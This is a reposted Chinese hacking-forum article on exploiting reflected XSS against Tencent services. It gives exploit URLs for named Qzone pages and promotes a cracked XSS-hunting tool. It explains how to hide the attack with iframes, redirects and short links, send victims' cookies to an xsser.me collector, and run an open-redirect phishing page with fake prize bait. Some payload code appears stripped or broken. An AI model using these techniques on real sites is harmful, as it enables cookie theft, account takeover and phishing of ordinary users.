漫谈反射xss利用

晚上无聊，没打草稿，想到哪，写到哪，凑合看吧.

先打个作者：Y35U

1，反射xss威力大吗？

反射xss相比flashxss和存储xss要多多了.

so对于用户基数越大的网站，反射xss的威力就越大

因为多嘛，所以利用者会大增。

再者，存储的封的会快，而反射的封的相对不及时。

xss中，普遍认为存储的危害最大，那是要看你X谁了

如果你要x管理员，那肯定是存储的危害大

如果你要x更多的人（跟你同等身份的访问者），存储的xss可以写蠕虫，效果明显，反射也可以，效果次之。

如果你要x指定的人（跟你同等身份的访问者），两者效果一样

再读读这个“跨站脚本-可以让战场离得更远（浅谈腾讯架构缺陷） ”

2，怎么找反射xss？

典型的工具，比如：DOMinatorPro破解版，下载地址：DOMinator.zip，文件大小：16.46M

DOMinator使用实例-视频，视频下载：轻松挖QQ的反射型XSS.zip，文件大小：48.34M

使用注意：
1.NoteYou may need to download VC++ Redist Package from Microsoft 32Bit or 64Bit
64位：http://www.microsoft.com/zh-cn/download/details.aspx?id=14632
32位：http://www.microsoft.com/en-us/download/details.aspx?id=5555
如果你是64位系统，上面两个都要安装
2.解压即可使用，会弹出未注册，不影响正常使用.
3.使用之前，要关闭本机的火狐浏览器.运行解压开内的firefox.exe即可.
++++++++++++++++++++++++++++++++++++++++++++++++++

当然还有更多，比如BurpSuite的xsssacn插件，还有一些个人写的专业的工具.

所以反射xss叫只要神器在手，不怕xss没有了。

某牛说，不用工具，一天找tx的能找几十个.所以说，有技术真可怕。

3，如何把反射xss利用的“天衣无缝”？

反射跟存储的不同点在什么地方，我们要知道，只要能弥补掉反射的不完美之处，我们才好去处理。

0x1,浏览器的因素，浏览器对反射xss的影响是最大的    解决:bypass各种浏览器，这是可以做到的。

0x2，反射的url容易被明眼人看出来 解决：使用iframe框架，url跳转

4.能看看实际案例吗？？

A.

http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));">


	原型


	exp：

http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));">


	这个已经直接bypass各浏览器了。


	A-1 


	我们直接框架到wooyun.org/index.html页面（举个例子哦）


	在index.html 
标签内添加



	用户体验：wooyun.org，抓到cookies传送到xssserme


	A-2


	如果不容许iframe怎么办？即，iframe之后，会跳出该src页面，岂不是暴露了


	那就跳转吧


	EXP：

http://ctc.qzs.qq.com/qzone/v6/newlimit/index.html?s=1&uin=114967639));">&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639


	对了一句document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639


	这个你可以写进xsser.me的js里面，这样url就跟第一个exp一样了。作用就是跳到正常页面去



	用户体验：wooyun.org，跳转到exp地址，再跳到正常页面，因为exp地址跟正常页面地址变化是最后面，跳的也很快，不是技术型的，看不出来，


	B.


	如果exp不通用，就是要针对ie9，FF有不同的exp


	也很简单，ie8，ie9，chrome bypass这样的文章很多，可以看看


	那我们要做的就是


	iframe exp.js      // exp.js负责判断浏览器版本，然后根据不同版本，输出不同的exp，针对打击


	跟上面的A案例相比，就多一段js代码，即判断浏览器版本


	要多写几个exp，跟A案例一样的形式，针对浏览器主要的有IE8.IE9.火狐.chrome.other（比如360.搜狗,都是用的ie内核）


	把exp.js写成通用的，以后你有其他exp的时候，只需替换exp，就不用没次都写代码了，一劳永逸啊。


	我写的给朋友看了，人家说非常烂，就不亮了，丢人。


	C.


	如果有一个完美的iframe xss，钓鱼的成功率相当之高

http://baoxian.tenpay.com/zhongmin.shtml?redirecturl=http://xj.hk/tenpay/ 

	可以把http://xj.hk/tenpay/用tx微博短地址加密一下。


	当然，这个xss也可以去用javascript去抓cookies，但是我觉得钓鱼的危害更大！


	当时测试，两用型，如果你害怕对手不上当，可以借鉴案例A去抓cookies ，如果你觉得对手是小白


	这个钓鱼的成功率是相当之高


	D.


	你即要抓cookies，又要钓鱼（太狠了点）


	这样就有冲突，因为抓cookies的要点是当前url是其他网站，只是框架了tx的地址


	而钓鱼，则必须url是tx的地址，才可信


	所为鱼和胸罩不可得兼、


	如果都是是纯小白，url又长，倒是可以试试


	做起来很简单，比如案例A来说


	在xsserme的js加上

top.document.body.innerHTML="";

	做法跟A-2一样，用调转，比如，标题写着，tx抽奖活动，百分百中奖，大家快去领


	把wooyun.org用tx短网址加密，或者直接发微博吧。。。


	访问短网址之后，会二级跳到xss地址


	这个时候，执行了xssserme的js，先抓了cookies，又重写了页面...............


	好了，暂时想到这么多，下回再写哈


	转自：http://www.3hack.com/paper/漫谈反射xss利用.txt

    文章来源于lcx.cc:漫谈反射xss利用
相关推荐: 【VC++】VC++ ShellExecute 函数详解

ShellExecute ShellExecute的功能是运行一个外部程序（或者是打开一个已注册的文件、打开一个目录、打印一个文件等等），并对外部程序有一定的控制。 基本简介： 　　有几个API函数都可以实现这些功能，但是在大多数情况下ShellExecute…